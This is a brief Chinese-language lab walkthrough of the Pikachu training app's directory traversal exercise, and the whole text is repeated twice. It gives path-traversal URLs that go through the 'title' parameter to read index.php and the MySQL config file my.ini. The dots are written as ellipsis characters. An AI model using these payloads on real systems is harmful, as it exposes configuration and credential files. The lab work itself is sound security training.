第一步:访问目标网站
第二步:单击第一个链接和第二个链接查看内容
第三步:发现URL是通过title传参过去的,那么是否可以访问某些敏感文件
访问首页:http://192.168.106.130/pikachu/vul/dir/dir_list.php?title=…/…/…/index.php
访问敏感文件:http://192.168.106.130/pikachu/vul/dir/dir_list.php?title=…/…/…/…/…/mysql/my.ini
第一步:访问目标网站
第二步:单击第一个链接和第二个链接查看内容
第三步:发现URL是通过title传参过去的,那么是否可以访问某些敏感文件
访问首页:http://192.168.106.130/pikachu/vul/dir/dir_list.php?title=…/…/…/index.php
访问敏感文件:http://192.168.106.130/pikachu/vul/dir/dir_list.php?title=…/…/…/…/…/mysql/my.ini
